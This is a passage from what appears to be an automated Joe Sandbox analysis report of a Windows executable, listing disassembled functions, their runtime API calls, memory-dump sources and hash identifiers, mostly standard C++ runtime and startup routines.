                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00201DB0,?,?,00000000,002027F1,3BC7ADCC,?,?,00000000,00000000,0020A6A0,000000FF,?,0020805E,?), ref: 0020834A
                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(?,00000000,002027F1,3BC7ADCC,?,?,00000000,00000000,0020A6A0,000000FF,?,0020805E,?,?,?,?), ref: 00208369
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@fclose
                                                      • String ID:
                                                      • API String ID: 356833432-0
                                                      • Opcode ID: 4a06176d4f17025d14132af8d507deb86b1bf547d230707ff42c40b3fba8f171
                                                      • Instruction ID: c773948ec67276b5a94833afac4f202647c085cb1ff62aa37e1660778ede5c10
                                                      • Opcode Fuzzy Hash: 4a06176d4f17025d14132af8d507deb86b1bf547d230707ff42c40b3fba8f171
                                                      • Instruction Fuzzy Hash: 78115B70210B26EFC3188F6AE488756FBE5BF88304F548129D94883B51CBB1B879CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 0020A128 Relevance: 9.1, APIs: 6, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0020A134
                                                      • memset.VCRUNTIME140(?,00000000,00000003), ref: 0020A15A
                                                      • memset.VCRUNTIME140(?,00000000,00000050), ref: 0020A1E4
                                                      • IsDebuggerPresent.KERNEL32 ref: 0020A200
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0020A220
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0020A22A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 1045392073-0
                                                      • Opcode ID: 325d81c84664ba9558d506f75df9f5086db059a5e3aedd6ceae0f0d3c8f36d0e
                                                      • Instruction ID: bb23af521595ef431e60b6639a04b59188f533abd781c050e8c12ff5e0607d4b
                                                      • Opcode Fuzzy Hash: 325d81c84664ba9558d506f75df9f5086db059a5e3aedd6ceae0f0d3c8f36d0e
                                                      • Instruction Fuzzy Hash: 883147B5D15318DBDB10DFA4D9897CDBBB8AF08300F5041AAE50CAB291EB719A84CF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0020A2FC Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0020A30E
                                                      • GetCurrentThreadId.KERNEL32 ref: 0020A31D
                                                      • GetCurrentProcessId.KERNEL32 ref: 0020A326
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0020A333
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 2933794660-0
                                                      • Opcode ID: d5d8b950f6a63a6a27f61a9f232fb41ecab647edc0f985a3b062c673e60c0f0b
                                                      • Instruction ID: b7cf90799addaf76c34f2ef8f0635777a4087924082ded0bea8ef9a9447e407b
                                                      • Opcode Fuzzy Hash: d5d8b950f6a63a6a27f61a9f232fb41ecab647edc0f985a3b062c673e60c0f0b
                                                      • Instruction Fuzzy Hash: 44F0AFB0C10208EBCB00DBB4D989A9EBBF8EF08301F6189959402E7151E734AB04CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00209F44 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00209F5A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: FeaturePresentProcessor
                                                      • String ID:
                                                      • API String ID: 2325560087-0
                                                      • Opcode ID: 4a6bf2837447ea91159dd165dcb14bc612ccdb90596e2b296404b3ae88d51187
                                                      • Instruction ID: 74149ad99d590ee905624dea944fdc8a424cd6a7d2e0a23f75129dadcbfb5413
                                                      • Opcode Fuzzy Hash: 4a6bf2837447ea91159dd165dcb14bc612ccdb90596e2b296404b3ae88d51187
                                                      • Instruction Fuzzy Hash: C95102B1A1030ADFDB18CF54E8897EABBF2FB58300F50852AD405EB291D775D964CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0020A28D Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000A299,00209BD8), ref: 0020A292
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 0c2366b42b39983c9646d578ca47e6f05c4a61dc2663fc90273b83355e6d033d
                                                      • Instruction ID: 4869d41cf9aef9661997a8129aa16343105ab8e9f96adc828adf6745acf5ba84
                                                      • Opcode Fuzzy Hash: 0c2366b42b39983c9646d578ca47e6f05c4a61dc2663fc90273b83355e6d033d
                                                      • Instruction Fuzzy Hash:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00208F00 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 195COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021,00000000), ref: 00208FE7
                                                      • memcpy.VCRUNTIME140(00000000,?,_% ,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021,00000000), ref: 00209000
                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021,00000000), ref: 00209011
                                                      • memcpy.VCRUNTIME140(?,00000000,?,00000000,?,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021), ref: 00209024
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021), ref: 00209079
                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021,00000000), ref: 00209091
                                                      • memcpy.VCRUNTIME140(?,00000000,?,?,?,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021), ref: 002090A9
                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,00000000,?,?,?,?,00000000,00000000,00000001,?,0020255F,?,?), ref: 002090B5
                                                      • memcpy.VCRUNTIME140(00000000,00000021,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021,00000000), ref: 002090CC
                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000021,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021), ref: 002090E3
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 002090F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                      • String ID: _%
                                                      • API String ID: 1155477157-1262239920
                                                      • Opcode ID: d14ddf6fc4dbc7e4a9118d6f0925695cc70c09e6cc679b437418242c41928804
                                                      • Instruction ID: 38a2b51930185841ea421fe34e31a21425e9a294ae0fe1fde0bebf2f1c69b729
                                                      • Opcode Fuzzy Hash: d14ddf6fc4dbc7e4a9118d6f0925695cc70c09e6cc679b437418242c41928804
                                                      • Instruction Fuzzy Hash: 4361B572E10316AFCB10DFB8CC859AFBBB6FF48310B544169E515E7292D6319960CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00208960 Relevance: 16.8, APIs: 11, Instructions: 317COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000,002125FC), ref: 00208A16
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,002125FC), ref: 00208A61
                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000,002125FC), ref: 00208A69
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00208A91
                                                      • memcpy.VCRUNTIME140(00000000,7FFFFFFF,?,00000000,00000000), ref: 00208B71
                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,7FFFFFFF,?,00000000,00000000), ref: 00208B7F
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00000000), ref: 00208BC2
                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000), ref: 00208BCA
                                                      • memcpy.VCRUNTIME140(7FFFFFFF,?,?,00000000,?,?,00000000,00000000), ref: 00208BD6
                                                        • Part of subcall function 00201EE0: ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(string too long,00207F45), ref: 00201EE5
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00208BF6
                                                        • Part of subcall function 00201E40: _CxxThrowException.VCRUNTIME140(?,00210348), ref: 00201E57
                                                        • Part of subcall function 00201E40: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,00210348), ref: 00201E7E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$ExceptionThrowXlength_error@std@@__std_exception_copy
                                                      • String ID:
                                                      • API String ID: 1121618468-0
                                                      • Opcode ID: 406d023dd619c27cd62c422ae60b6b16228c4ee682d370a9ce79327e0fed4831
                                                      • Instruction ID: feb1eb3b7cf5a2ad9a22f50ea395a7c118b368b8eab022d85666f4065803b226
                                                      • Opcode Fuzzy Hash: 406d023dd619c27cd62c422ae60b6b16228c4ee682d370a9ce79327e0fed4831
                                                      • Instruction Fuzzy Hash: 99A1E372A202059FCB15DF68D88066FBBA6FF84310F644269E855DB383DB70DE618B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00209400 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memcpy.VCRUNTIME140(00000000,C:\Users\,?,?,00000000,00000001), ref: 002094CB
                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,C:\Users\,?,?,00000000,00000001), ref: 002094D9
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00000001), ref: 00209516
                                                      • memcpy.VCRUNTIME140(00000000,C:\Users\,?,?,00000000,00000001), ref: 0020951C
                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,C:\Users\,?,?,00000000,00000001), ref: 00209526
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00209540
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                      • String ID: C:\Users\
                                                      • API String ID: 1155477157-773679268
                                                      • Opcode ID: 0b3bd955bba59a611ebae51e307080de71b11039fcad9e4d2cbf3233c9c770be
                                                      • Instruction ID: d344cd2e335b4158bf136b1d10deae4a46758d3aa3e32e6732a78d4c783c3f25
                                                      • Opcode Fuzzy Hash: 0b3bd955bba59a611ebae51e307080de71b11039fcad9e4d2cbf3233c9c770be
                                                      • Instruction Fuzzy Hash: BC411672E213159FCB04AF69DC8156EB7A9EF44310BA502B9E807D7283EA70DD618B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002092A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000000,00000000,00000001,?,00202130,00000000,?), ref: 0020936B
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000000,00000000,00000001,?,00202130,00000000,?), ref: 0020937A
                                                      • memcpy.VCRUNTIME140(?,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00202130,00000000,?), ref: 00209390
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00000001,?,00202130,00000000,?), ref: 002093E7
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 002093ED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                      • String ID: 0! $0!
                                                      • API String ID: 1155477157-2230610793
                                                      • Opcode ID: 0b15e23fb0db83bd6bd28ea45793458cd67f76cec25212b7b12742c9235a6458
                                                      • Instruction ID: d48a5110868a574e85498dffb18032b297c54076a522955ff72b9dc65881de68
                                                      • Opcode Fuzzy Hash: 0b15e23fb0db83bd6bd28ea45793458cd67f76cec25212b7b12742c9235a6458
                                                      • Instruction Fuzzy Hash: 7941A4B2A207019FD718DF68CC8596EB7A8EB493107148769E816D72D3E770EEA1CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00208780 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,3BC7ADCC,00000000,P ,?,0020BB56,000000FF,?,002084CE), ref: 002087B5
                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,0020BB56,000000FF), ref: 002087D0
                                                      • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,0020BB56,000000FF), ref: 002087FB
                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,0020BB56,000000FF), ref: 0020881E
                                                      • std::_Facet_Register.LIBCPMT ref: 00208837
                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,0020BB56,000000FF), ref: 00208852
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                      • String ID: P
                                                      • API String ID: 3960873448-3559530664
                                                      • Opcode ID: b69ad9b3f2818144fc32804c77a42d5b4148add4dc8450477ff73a0a78c99a4f
                                                      • Instruction ID: 22322d17e1aa7510d9818c13188a80adbc607823ffe18aa97eec82e7abf95718
                                                      • Opcode Fuzzy Hash: b69ad9b3f2818144fc32804c77a42d5b4148add4dc8450477ff73a0a78c99a4f
                                                      • Instruction Fuzzy Hash: 07316971D1021ADBCB11CF58E848BAEBBB4FB04720F54825AE816A7292DB30AD54CBD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00209B20 Relevance: 12.1, APIs: 8, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 00209B23
                                                      • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 00209B2E
                                                      • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 00209B3A
                                                      • __RTC_Initialize.LIBCMT ref: 00209B52
                                                      • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,0020A431), ref: 00209B67
                                                        • Part of subcall function 0020A39A: InitializeSListHead.KERNEL32(002125E0,00209B77), ref: 0020A39F
                                                      • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_0000A248), ref: 00209B85
                                                      • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 00209BA0
                                                      • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00209BAF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                                      • String ID:
                                                      • API String ID: 1933938900-0
                                                      • Opcode ID: f2e6f82648133549e8baff1a406913627423b51566e49fcbeb860dc69067656a
                                                      • Instruction ID: 74f5c6797349568cc60ee9d090d7ec98b4750361b4c567683ae22a6bf18ba7c7
                                                      • Opcode Fuzzy Hash: f2e6f82648133549e8baff1a406913627423b51566e49fcbeb860dc69067656a
                                                      • Instruction Fuzzy Hash: 880136599703125DDB117BF5680BE5E22441F52764FC445A5BC479A0C3EE96C4B28CB3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002026B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(3BC7ADCC,00000000,?,00000001,00000000,0020A6A0,000000FF,?,0020268C,?,00000021), ref: 00202734
                                                      • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,0020268C,?,00000021), ref: 0020273D
                                                      • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,0020268C,?,00000021), ref: 00202745
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_istream@??1?$basic_streambuf@
                                                      • String ID: P
                                                      • API String ID: 1860543750-3559530664
                                                      • Opcode ID: c53efe6864c54a3fd5cc84eeb7f1797cdc4c1a0cc0f9a4e3037e7d8f24dbe86c
                                                      • Instruction ID: 8a1e0cba2531ed3a15d406b90aec8b874c33e63b3060e22b512393e9b27db79a
                                                      • Opcode Fuzzy Hash: c53efe6864c54a3fd5cc84eeb7f1797cdc4c1a0cc0f9a4e3037e7d8f24dbe86c
                                                      • Instruction Fuzzy Hash: 5A213D75614246CFC716CF18D588BA9FBF5FB49708F1042ADE405873A1DB35A929CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00202770 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(3BC7ADCC,?,?,00000000,00000000,0020A6A0,000000FF,?,0020805E,?,?,?,?,?), ref: 002027F4
                                                      • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,00000000,00000000,0020A6A0,000000FF,?,0020805E,?,?,?,?,?), ref: 002027FD
                                                      • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,00000000,00000000,0020A6A0,000000FF,?,0020805E,?,?,?,?,?), ref: 00202805
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@
                                                      • String ID: P
                                                      • API String ID: 4286870943-3559530664
                                                      • Opcode ID: c099e011947c660ba4c7ecb913a419b4dcec645491ec2e737964d10e68b14661
                                                      • Instruction ID: 1ad9f248b840897afb5775c6dcfd58906695217a35a640b5e69bb479110829d4
                                                      • Opcode Fuzzy Hash: c099e011947c660ba4c7ecb913a419b4dcec645491ec2e737964d10e68b14661
                                                      • Instruction Fuzzy Hash: 712159B5608306CFCB05CF19D888B69FBF5FB49718F1041A9E40A8B3A1DB316969CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00209841 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __current_exception.VCRUNTIME140 ref: 00209881
                                                      • __current_exception_context.VCRUNTIME140 ref: 00209891
                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00209898
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
